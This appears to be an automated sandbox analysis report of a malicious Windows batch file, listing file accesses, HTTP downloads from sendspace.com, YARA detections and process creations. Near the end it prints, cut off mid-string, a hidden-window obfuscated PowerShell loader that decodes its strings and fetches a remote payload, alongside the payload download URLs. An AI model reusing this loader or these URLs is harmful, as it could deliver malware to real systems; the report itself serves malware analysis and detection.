Source: |
Binary string: \??\C:\Windows\System.Management.Automation.pdb? source: powershell.exe, 00000005.00000002.2184760858.000000000784A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2184760858.0000000007831000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: m.Core.pdbSt source: powershell.exe, 00000005.00000002.2184760858.000000000784A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2184760858.0000000007831000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows |
Jump to behavior |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/5m5a1u HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /dlpro/3c9fc79de649f1492cc7b06003ebcaeb/664f936b/5m5a1u/Tyvstjlendes.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs13n3.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/wyg3h5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs03n3.sendspace.comConnection: Keep-AliveCookie: SID=mqp5phs8i4ibarpn7np6voj641 |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/5m5a1u HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /dlpro/3c9fc79de649f1492cc7b06003ebcaeb/664f936b/5m5a1u/Tyvstjlendes.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs13n3.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/wyg3h5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs03n3.sendspace.comConnection: Keep-AliveCookie: SID=mqp5phs8i4ibarpn7np6voj641 |
Source: powershell.exe, 00000005.00000002.2184760858.00000000077FA000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.micro |
Source: powershell.exe, 00000002.00000002.2441978527.000002045CC36000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://fs13n3.sendspace.com |
Source: powershell.exe, 00000002.00000002.2611833386.000002046AEC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2181785367.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000005.00000002.2178140808.0000000004D4B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.2441978527.000002045AE51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2178140808.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2921644464.0000000025F31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000005.00000002.2178140808.0000000004D4B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.2441978527.000002045CBFE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.sendspace.com |
Source: powershell.exe, 00000002.00000002.2441978527.000002045AE51000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000005.00000002.2178140808.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000005.00000002.2181785367.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000005.00000002.2181785367.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000005.00000002.2181785367.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: wab.exe, 0000000A.00000002.2907942536.000000000A56E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n3.sendspace.com/ |
Source: wab.exe, 0000000A.00000002.2907942536.000000000A56E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n3.sendspace.com/I6 |
Source: wab.exe, 0000000A.00000003.2151778284.000000000A57F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin |
Source: wab.exe, 0000000A.00000003.2151778284.000000000A57F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin2d52 |
Source: wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin8F4H |
Source: wab.exe, 0000000A.00000002.2907942536.000000000A56E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.binP93 |
Source: wab.exe, 0000000A.00000002.2907942536.000000000A56E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.binj92 |
Source: wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.binotBe |
Source: wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n3.sendspace.com/m6 |
Source: powershell.exe, 00000002.00000002.2441978527.000002045CC23000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n3.sendspaX |
Source: powershell.exe, 00000002.00000002.2441978527.000002045CC23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2441978527.000002045B2E4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n3.sendspace.com |
Source: powershell.exe, 00000002.00000002.2441978527.000002045B2E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2441978527.000002045CBFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2441978527.000002045CC1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2441978527.000002045CC23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2441978527.000002045B2E4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n3.sendspace.com/dlpro/3c9fc79de649f1492cc7b06003ebcaeb/664f936b/5m5a1u/Tyvstjlendes.pfb |
Source: powershell.exe, 00000005.00000002.2178140808.0000000004D4B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.2441978527.000002045C0E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000002.00000002.2611833386.000002046AEC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2181785367.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000002.00000002.2441978527.000002045B07D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2441978527.000002045C713000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com |
Source: powershell.exe, 00000002.00000002.2441978527.000002045B07D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/5m5a1uP |
Source: powershell.exe, 00000005.00000002.2178140808.0000000004D4B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/5m5a1uXRul |
Source: wab.exe, 0000000A.00000002.2920474997.00000000255A0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2907942536.000000000A552000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/wyg3h5 |
Source: wab.exe, 0000000A.00000003.2151778284.000000000A57F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/wyg3h5j83 |
Source: wab.exe, 0000000A.00000002.2907942536.000000000A552000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/wyg3h5z |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49731 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49730 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49731 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49730 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49739 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49738 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49738 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49739 -> 443 |
Source: amsi32_7744.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7488, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7744, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 2_2_00007FFD9B8AAB16 |
2_2_00007FFD9B8AAB16 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 2_2_00007FFD9B8AB8C2 |
2_2_00007FFD9B8AB8C2 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 5_2_04BBE928 |
5_2_04BBE928 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 5_2_04BBF1F8 |
5_2_04BBF1F8 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 5_2_04BBE5E0 |
5_2_04BBE5E0 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 10_2_0327EB98 |
10_2_0327EB98 |
Source: amsi32_7744.amsi.csv, type: OTHER |
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution |
Source: Process Memory Space: powershell.exe PID: 7488, type: MEMORYSTR |
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution |
Source: Process Memory Space: powershell.exe PID: 7744, type: MEMORYSTR |
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Mutant created: NULL |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Mutant created: \Sessions\1\BaseNamedObjects\2utLZrxcByvppTdF |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03 |
Source: unknown |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\zap.cmd" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91 'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag. Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6 Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre r1Trich0Svanh0Pauci1condu0op.ak1,elss SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou ';$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr ';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress= (Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,ca |